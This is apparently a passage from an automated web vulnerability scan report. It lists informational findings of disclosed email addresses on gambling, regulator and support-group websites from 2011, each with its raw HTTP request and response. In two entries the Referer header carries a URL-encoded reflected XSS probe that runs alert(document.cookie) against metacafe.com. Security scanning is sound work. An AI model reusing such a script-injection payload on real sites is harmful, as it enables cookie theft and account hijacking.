<DATA ref="#business.contact-info.online.email">support@primegaming.com</DATA>
...[SNIP]...

21.30. http://widgets.twimg.com/j/2/widget.css

Summary

Severity:   Information
Confidence:   Certain
Host:   http://widgets.twimg.com
Path:   /j/2/widget.css

Issue detail

The following email address was disclosed in the response: dustin@twitter.com (author line in the file's licence comment; this is a third-party CDN asset, not an application under test)

Request

GET /j/2/widget.css HTTP/1.1
Host: widgets.twimg.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/css,*/*;q=0.1
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.metacafe.com/fplayer/?4702d%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Ebe96a23f3a3=1

Response

HTTP/1.0 200 OK
x-amz-id-2: yFPEo7/5CTnxmKnUEjXU1/OmPGPsNh0IMRRhNdN4WTdj8fNE1ntiR92x6Uowmhmg
x-amz-request-id: DD5E22500AC48FB0
Date: Sun, 08 May 2011 02:35:35 GMT
Expires: Sat, 27 Feb 2021 01:15:01 GMT+00:00
Last-Modified: Wed, 02 Mar 2011 01:15:13 GMT
ETag: "9842b420d8c91a4cbb004d17a5d54054"
Accept-Ranges: bytes
Content-Type: text/css
Content-Length: 3430
Server: AmazonS3
Age: 728178
X-Cache: Hit from cloudfront
X-Amz-Cf-Id: 781b08720daee608100b86b9caa21fe538f20b06be5da6738553668be3dd6d454b31c00869f5f7f7
Via: 1.0 b211469d843c22c59dc668f60ed60542.cloudfront.net:11180 (CloudFront), 1.0 45578d14a69df96accaab0d1aba82a5a.cloudfront.net:11180 (CloudFront)
Connection: keep-alive

/**
* Twitter - http://twitter.com
* Copyright (C) 2010 Twitter
* Author: Dustin Diaz (dustin@twitter.com)
*
* V 2.2.5 Twitter search/profile/faves/list widget
* http://twitter.com/widgets
* For full documented source see http://twitter.com/javascripts/widgets/widget.js
* Hosting and modifications of
...[SNIP]...

21.31. http://widgets.twimg.com/j/2/widget.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://widgets.twimg.com
Path:   /j/2/widget.js

Issue detail

The following email address was disclosed in the response: dustin@twitter.com (author line in the file's licence comment; this is a third-party CDN asset, not an application under test)

Request

GET /j/2/widget.js HTTP/1.1
Host: widgets.twimg.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.metacafe.com/fplayer/?4702d%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Ebe96a23f3a3=1

Response

HTTP/1.0 200 OK
x-amz-id-2: /PA731toNx972OXjAmpMncbSDYG7pU/61LXV/1IwSSaURoBa3/0W99IUiTyaOKij
x-amz-request-id: 1F8F72FFC4060381
Date: Fri, 06 May 2011 15:21:09 GMT
Last-Modified: Fri, 08 Apr 2011 20:34:17 GMT
ETag: "8f109f7ba100454bc391fc07377c1aed"
Accept-Ranges: bytes
Content-Type: application/javascript
Content-Length: 31383
Server: AmazonS3
Age: 27009
X-Cache: Hit from cloudfront
X-Amz-Cf-Id: 22dee5c2ac7e1480fffa417aaa38dacca8ef672fcee8d5cb4808d2ed41642b8cf488a527a8e435fe
Via: 1.0 2fa8d070c031e7b04698c494d003c248.cloudfront.net:11180 (CloudFront), 1.0 45578d14a69df96accaab0d1aba82a5a.cloudfront.net:11180 (CloudFront)
Connection: keep-alive

/**
* Twitter - http://twitter.com
* Copyright (C) 2010 Twitter
* Author: Dustin Diaz (dustin@twitter.com)
*
* V 2.2.5 Twitter search/profile/faves/list widget
* http://twitter.com/widgets
* For full documented source see http://twitter.com/javascripts/widgets/widget.js
* Hosting and modifications of
...[SNIP]...

21.32. http://www.bet365.com/home/js/FlashDetection_vA009cr.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bet365.com
Path:   /home/js/FlashDetection_vA009cr.js

Issue detail

The following email addresses were disclosed in the response:

Request

GET /home/js/FlashDetection_vA009cr.js HTTP/1.1
Host: www.bet365.com
Proxy-Connection: keep-alive
Referer: http://www.bet365.com/en/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: rmbs=2; stk=F2905C3D11AA414789D6755EE19B7B33000002; session=stk=F2905C3D11AA414789D6755EE19B7B33000002; aps03=ct=198&lng=1

Response

HTTP/1.1 200 OK
Age: 450918
Date: Mon, 16 May 2011 10:25:41 GMT
Cache-Control: private
Connection: Keep-Alive
Via: L016
ETag: "8053fb46b981cb1:608b"
Cteonnt-Length: 8450
Content-Type: application/x-javascript
Last-Modified: Thu, 11 Nov 2010 15:58:27 GMT
Accept-Ranges: bytes
X-Powered-By: ASP.NET
Content-Length: 8450

function FL_resizeFlashDiv(height,$a,$b){var $c='';if((typeof $b!=='undefined')&&($b!==null)){$c=(Number($b)==1)?'Highlights':(Number($b)==2)?'Next3RacesApp':(Number($b)==3)?'Financials':$a;};if(heigh
...[SNIP]...
on=no,menubar=no,status=no,toolbar=no,width=400,height=275');};function FL_OthersAvailable($F,$G,$H){if(ChckUserLoged()){var $I=$F.split("-");var $J="Others On Request";var $K="";switch($H){case 1:$K="support@customerservices365.com";break;case 2:$K="support-tch@customerservices365.com";break;case 3:$K="support-spa@customerservices365.com";break;case 4:$K="support@customerservices365.com";break;case 5:$K="support-ger@customerservices365.com";break;case 6:$K="support-ita@customerservices365.com";break;case 7:$K="support-dan@customerservices365.com";break;case 8:$K="support-swe@customerservices365.com";break;case 9:$K="support-nor@customerservices365.com";break;case 10:$K="support-sch@customerservices365.com";break;case 14:$K="support@customerservices365.com";break;};window.location="mailto:"+$K+"?subject="+$J+"&body=Username: "+$G+"; www.bet365.com/home/default.asp?deeplink=oor%26cid="+$I[4]+"%26c1i="+$I[0]+"%26c1t="+$I[1]+"%26c2i="+$I[2]+"%26c2t="+$I[3]
...[SNIP]...

21.33. http://www.bet365.com/home/js/Navigation_vA081cr.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bet365.com
Path:   /home/js/Navigation_vA081cr.js

Issue detail

The following email address was disclosed in the response:

Request

GET /home/js/Navigation_vA081cr.js HTTP/1.1
Host: www.bet365.com
Proxy-Connection: keep-alive
Referer: http://www.bet365.com/en/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: rmbs=2; stk=F2905C3D11AA414789D6755EE19B7B33000002; session=stk=F2905C3D11AA414789D6755EE19B7B33000002; aps03=ct=198&lng=1

Response

HTTP/1.1 200 OK
Age: 20302
Date: Mon, 16 May 2011 11:37:26 GMT
Cache-Control: private
Connection: Keep-Alive
Via: L016
ETag: "06a19bb71ecc1:6c91"
Cteonnt-Length: 149211
Content-Type: application/x-javascript
Last-Modified: Mon, 09 May 2011 17:51:32 GMT
Accept-Ranges: bytes
X-Powered-By: ASP.NET
Content-Length: 149211


var DocLoaded=0;var DoSubmitForm=0;var lgm=null;var WhichDiv;var TrackOpenClose='';var maxCoupons=8;var silksNotSet=false;var resultsPageId=6000;var m_blnBetSlip=false;var reqFlashVersion=7;var g_Re
...[SNIP]...
ookieTest();var $0g="status=no,toolbar=no,menubar=no,resizable=yes,location=yes,alwaysRaised=yes";var $0e="https://www.paypal.com/cgi-bin/webscr?cmd=_ext-enter&redirect_cmd=_xclick";var $0h="&business=customerservices@bet365usa.com&item_name=Bet365 Deposit&no_note=1&no_shipping=1";var $0i="&amount="+document.all.txtDeposit.value;var w=window.open(($0e+$0h+$0i),"bet365popup",$0g);snp(2260);SubmitForm();};function scorecastUpdateO
...[SNIP]...

21.34. https://www.betsson.com/en/customer-service/

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.betsson.com
Path:   /en/customer-service/

Issue detail

The following email address was disclosed in the response:

Request

GET /en/customer-service/ HTTP/1.1
Host: www.betsson.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 23563
Content-Type: text/html; Charset=UTF-8
Server: Microsoft-IIS/7.5
Set-Cookie: lggdnstt=0; path=/
Set-Cookie: section=customer; expires=Mon, 14-May-2012 23:00:00 GMT; path=/en
Set-Cookie: language=en; expires=Tue, 15-May-2012 23:00:00 GMT; path=/
Set-Cookie: site=en; expires=Tue, 15-May-2012 23:00:00 GMT; domain=.betsson.com; path=/
Set-Cookie: ASPSESSIONIDAASDBABS=IAMLJIPDMACCCMGFMONHJNKI; path=/
X-Powered-By: ASP.NET
p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Date: Mon, 16 May 2011 12:08:39 GMT
Connection: close
Set-Cookie: BIGipServerwww.betsson.com=682561964.20480.0000; path=/
Vary: Accept-Encoding


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
   <head>
   <meta http-
...[SNIP]...
<a href="mailto:responsiblegaming@betsson.com">responsiblegaming@betsson.com</a>
...[SNIP]...

21.35. https://www.betsson.com/en/customer-service/responsible-gaming/

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.betsson.com
Path:   /en/customer-service/responsible-gaming/

Issue detail

The following email addresses were disclosed in the response:

Request

GET /en/customer-service/responsible-gaming/ HTTP/1.1
Host: www.betsson.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 16796
Content-Type: text/html; Charset=UTF-8
Server: Microsoft-IIS/7.5
Set-Cookie: lggdnstt=0; path=/
Set-Cookie: section=customer; expires=Mon, 14-May-2012 23:00:00 GMT; path=/en
Set-Cookie: language=en; expires=Tue, 15-May-2012 23:00:00 GMT; path=/
Set-Cookie: site=en; expires=Tue, 15-May-2012 23:00:00 GMT; domain=.betsson.com; path=/
Set-Cookie: ASPSESSIONIDAASDBABS=JAMLJIPDANILAPALKCAONEIB; path=/
X-Powered-By: ASP.NET
p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Date: Mon, 16 May 2011 12:08:40 GMT
Connection: close
Set-Cookie: BIGipServerwww.betsson.com=682561964.20480.0000; path=/
Vary: Accept-Encoding


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
   <head>
       <meta ht
...[SNIP]...
<a href="mailto:responsiblegaming@betsson.com">responsiblegaming@betsson.com </a>
...[SNIP]...
<a href="mailto:info@gamcare.org.uk">info@gamcare.org.uk</a>
...[SNIP]...
<a href="mailto:help@gordonhouse.org.uk">help@gordonhouse.org.uk</a> / <a href="mailto:webmaster@gamblingtherapy.org">webmaster@gamblingtherapy.org</a>
...[SNIP]...

21.36. https://www.betsson.com/en/customer-service/terms/index.asp

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.betsson.com
Path:   /en/customer-service/terms/index.asp

Issue detail

The following email addresses were disclosed in the response:

Request

GET /en/customer-service/terms/index.asp HTTP/1.1
Host: www.betsson.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 68223
Content-Type: text/html; Charset=UTF-8
Server: Microsoft-IIS/7.5
Set-Cookie: lggdnstt=0; path=/
Set-Cookie: section=customer; expires=Mon, 14-May-2012 23:00:00 GMT; path=/en
Set-Cookie: language=en; expires=Tue, 15-May-2012 23:00:00 GMT; path=/
Set-Cookie: site=en; expires=Tue, 15-May-2012 23:00:00 GMT; domain=.betsson.com; path=/
Set-Cookie: ASPSESSIONIDAASDBABS=CBMLJIPDBDPNKEECBALHKDED; path=/
X-Powered-By: ASP.NET
p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Date: Mon, 16 May 2011 12:08:41 GMT
Connection: close
Set-Cookie: BIGipServerwww.betsson.com=682561964.20480.0000; path=/
Vary: Accept-Encoding


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
   <head>
       <meta ht
...[SNIP]...
<a href="mailto:support@betsson.com">support@betsson.com</a>
...[SNIP]...
<a href="mailto:support@betsson.com">support@betsson.com</a>
...[SNIP]...
<a href="mailto:complaints@lga.org.mt">complaints@lga.org.mt</a>
...[SNIP]...

21.37. http://www.bigmoneyscratch.com/Affiliates.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bigmoneyscratch.com
Path:   /Affiliates.aspx

Issue detail

The following email address was disclosed in the response:

Request

GET /Affiliates.aspx HTTP/1.1
Host: www.bigmoneyscratch.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UniqueVisitorID=221D36A4955B6C06841250648788A96C; LanguageCode=ENG; RegistrationMode=PM; BO=FM; CSI_12=EncryptedUniqueVisitorID=221D36A4955B6C06841250648788A96C&AffiliateID=12&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; CountryCode=US; CSITemp=12; ASP.NET_SessionId=d1so5b551ijeobbe4bfxso45;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:05:06 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: RegistrationMode=PM; domain=bigmoneyscratch.com; expires=Fri, 16-May-2014 12:05:06 GMT; path=/
Set-Cookie: BO=FM; domain=bigmoneyscratch.com; expires=Fri, 16-May-2014 12:05:06 GMT; path=/
Set-Cookie: UniqueVisitorID=221D36A4955B6C06841250648788A96C; domain=bigmoneyscratch.com; expires=Fri, 16-May-2014 12:05:06 GMT; path=/
Set-Cookie: LanguageCode=ENG; domain=bigmoneyscratch.com; expires=Fri, 16-May-2014 12:05:06 GMT; path=/
Set-Cookie: CountryCode=US; domain=bigmoneyscratch.com; expires=Fri, 16-May-2014 12:05:06 GMT; path=/
Set-Cookie: CSITemp=12; domain=bigmoneyscratch.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 46288


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmlMaster" xmlns="http://www.w3.org/1999/xhtml">
<hea
...[SNIP]...
<a href="mailto:affiliates@BigMoneyScratch.com" class="ContentLinks">affiliates@BigMoneyScratch.com</a>
...[SNIP]...

21.38. http://www.gamblersanonymous.org/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.gamblersanonymous.org
Path:   /

Issue detail

The following email address was disclosed in the response:

Request

GET / HTTP/1.1
Host: www.gamblersanonymous.org
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 12:18:24 GMT
Server: Apache
Last-Modified: Thu, 01 Apr 2010 20:42:43 GMT
Accept-Ranges: bytes
Content-Length: 2949
Content-Type: text/html

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML//EN">
<HTML>
<HEAD>
<TITLE>Gamblers Anonymous Official Home Page</TITLE></HEAD>
<BODY BACKGROUND="images/bkgrnd.gif">
<CENTER>
<TABLE BORDER="0" CELLPADDING="4
...[SNIP]...
<A
HREF="mailto:isomain@gamblersanonymous.org">
...[SNIP]...
<FONT SIZE="+1">isomain@gamblersanonymous.org</FONT>
...[SNIP]...

21.39. http://www.gx4.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.gx4.com
Path:   /

Issue detail

The following email address was disclosed in the response:

Request

GET / HTTP/1.1
Host: www.gx4.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 12:13:58 GMT
Server: Apache
Last-Modified: Fri, 05 Feb 2010 11:54:30 GMT
ETag: "34e8030-17e7-1d372980"
Accept-Ranges: bytes
Content-Length: 6119
Connection: close
Content-Type: text/html; charset=ISO-8859-1
X-Pad: avoid browser bug

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
<title>G4,
...[SNIP]...
<a href="mailto:info@gx4.com?subject=Newsletter subscription">
...[SNIP]...

21.40. http://www.huddletogether.com/projects/lightbox2/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.huddletogether.com
Path:   /projects/lightbox2/

Issue detail

The following email address was disclosed in the response:

Request

GET /projects/lightbox2/ HTTP/1.1
Host: www.huddletogether.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 12:12:16 GMT
Server: Apache
Last-Modified: Fri, 18 Mar 2011 17:56:45 GMT
ETag: "a0be022-2f25-49ec5804b3140"
Accept-Ranges: bytes
Content-Length: 12069
Vary: Accept-Encoding
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   
   <title>Lightbox 2<
...[SNIP]...
<input type="hidden" name="business" value="lokesh.dhakar@gmail.com" />
...[SNIP]...

21.41. http://www.lga.org.mt/lga/content.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.lga.org.mt
Path:   /lga/content.aspx

Issue detail

The following email address was disclosed in the response:

Request

GET /lga/content.aspx?id=109045 HTTP/1.1
Host: www.lga.org.mt
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 11:46:27 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 1.1.4322
Set-Cookie: ASP.NET_SessionId=kpe2x045cuhwf145d5bbn545; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 14976


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<HTML>
   <HEAD>
       <title>LGA ::
           Licensed Operators: Class 4
       </title>
       <meta content=
...[SNIP]...
<a href="mailto:info@lga.org.mt">info@lga.org.mt</a>
...[SNIP]...

21.42. http://www.lga.org.mt/lga/home.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.lga.org.mt
Path:   /lga/home.aspx

Issue detail

The following email address was disclosed in the response:

Request

GET /lga/home.aspx HTTP/1.1
Host: www.lga.org.mt
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 11:46:31 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 1.1.4322
Set-Cookie: ASP.NET_SessionId=3cjspfm1kdxdaju4khdahw45; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 8964


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<HTML>
   <HEAD>
       <TITLE>Lotteries and Gaming Authority .. 2008 </TITLE>
       <meta content="Lo
...[SNIP]...
<a href="mailto:info@lga.org.mt">
                           info@lga.org.mt</a>
...[SNIP]...

21.43. http://www.neogames.com/careers

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.neogames.com
Path:   /careers

Issue detail

The following email addresses were disclosed in the response:

Request

GET /careers HTTP/1.1
Host: www.neogames.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=120915991.1305546031.1.1.utmcsr=neogames-tech.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=120915991.104022393.1305546031.1305546031.1305546031.1; __utmc=120915991; __utmb=120915991.1.10.1305546031;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:14:22 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.3.5
X-Pingback: http://www.neogames.com/xmlrpc.php
Content-Type: text/html; charset=UTF-8
Content-Length: 6918

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en">

<head profile
...[SNIP]...
<a href="mailto:jobs@neogames.com">recruitment@neogames.com</a>
...[SNIP]...

21.44. http://www.neogames.com/contact-us

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.neogames.com
Path:   /contact-us

Issue detail

The following email addresses were disclosed in the response:

Request

GET /contact-us HTTP/1.1
Host: www.neogames.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=120915991.1305546031.1.1.utmcsr=neogames-tech.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=120915991.104022393.1305546031.1305546031.1305546031.1; __utmc=120915991; __utmb=120915991.1.10.1305546031;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:17:26 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.3.5
X-Pingback: http://www.neogames.com/xmlrpc.php
Content-Type: text/html; charset=UTF-8
Content-Length: 7505

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en">

<head profile
...[SNIP]...
<a href="mailto:sales@neogames.com">sales@neogames.com</a>
...[SNIP]...
<a href="mailto:support@neogames.com">support@neogames.com</a>
...[SNIP]...
<a href="mailto:recruitment@neogames.com">recruitment@neogames.com</a>
...[SNIP]...
<a href="mailto:info@neogames.com">info@neogames.com</a>
...[SNIP]...

21.45. http://www.neogames.com/corporate

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.neogames.com
Path:   /corporate

Issue detail

The following email address was disclosed in the response:

Request

GET /corporate HTTP/1.1
Host: www.neogames.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=120915991.1305546031.1.1.utmcsr=neogames-tech.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=120915991.104022393.1305546031.1305546031.1305546031.1; __utmc=120915991; __utmb=120915991.1.10.1305546031;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:16:24 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.3.5
X-Pingback: http://www.neogames.com/xmlrpc.php
Content-Type: text/html; charset=UTF-8
Content-Length: 7306

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en">

<head profile
...[SNIP]...
<a href="mailto:sales@neogames.com">sales@neogames.com</a>
...[SNIP]...

21.46. http://www.neogames.com/news-and-events/january-2011-neogames-sign-a-deal-with-interwetten-group

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.neogames.com
Path:   /news-and-events/january-2011-neogames-sign-a-deal-with-interwetten-group

Issue detail

The following email address was disclosed in the response:

Request

GET /news-and-events/january-2011-neogames-sign-a-deal-with-interwetten-group HTTP/1.1
Host: www.neogames.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=120915991.1305546031.1.1.utmcsr=neogames-tech.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=120915991.104022393.1305546031.1305546031.1305546031.1; __utmc=120915991; __utmb=120915991.1.10.1305546031;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:15:32 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.3.5
X-Pingback: http://www.neogames.com/xmlrpc.php
Content-Type: text/html; charset=UTF-8
Content-Length: 12294

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en">

<head profile
...[SNIP]...
<a href="mailto:sales@neogames.com">sales@neogames.com</a>
...[SNIP]...

21.47. https://www.norskelodd.com/no/FAQ

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.norskelodd.com
Path:   /no/FAQ

Issue detail

The following email address was disclosed in the response:

Request

GET /no/FAQ HTTP/1.1
Host: www.norskelodd.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: lggdnstt=0;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
Set-Cookie: lggdnstt=0; path=/
X-Powered-By: ASP.NET
Date: Mon, 16 May 2011 12:01:30 GMT
Connection: close
Content-Length: 122180
Vary: Accept-Encoding


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" >
<head>
<!-
...[SNIP]...
<a href="mailto:support@norskelodd.com">support@norskelodd.com</a>
...[SNIP]...

21.48. https://www.norskelodd.com/no/charity/

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.norskelodd.com
Path:   /no/charity/

Issue detail

The following email address was disclosed in the response:

Request

GET /no/charity/ HTTP/1.1
Host: www.norskelodd.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: lggdnstt=0;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
Set-Cookie: lggdnstt=0; path=/
X-Powered-By: ASP.NET
Date: Mon, 16 May 2011 12:01:29 GMT
Connection: close
Content-Length: 99027
Vary: Accept-Encoding


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" >
<head>
<!-
...[SNIP]...
<a href="mailto:charity@norskelodd.com">charity@norskelodd.com</a>
...[SNIP]...

21.49. http://www.opensource.org/licenses/mit-license.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.opensource.org
Path:   /licenses/mit-license.php

Issue detail

The following email addresses were disclosed in the response:

Request

GET /licenses/mit-license.php HTTP/1.1
Host: www.opensource.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 12:45:17 GMT
Server: Apache/2.2.17 (FreeBSD) mod_ssl/2.2.17 OpenSSL/0.9.8n DAV/2 SVN/1.6.16
Set-Cookie: SESScfc6ae0fd5872e4ca9e7dfd6aa7abb6f=51jln3d46i68pj609s4i8oat56; expires=Wed, 08-Jun-2011 16:18:37 GMT; path=/; domain=.opensource.org
Last-Modified: Mon, 16 May 2011 12:32:15 GMT
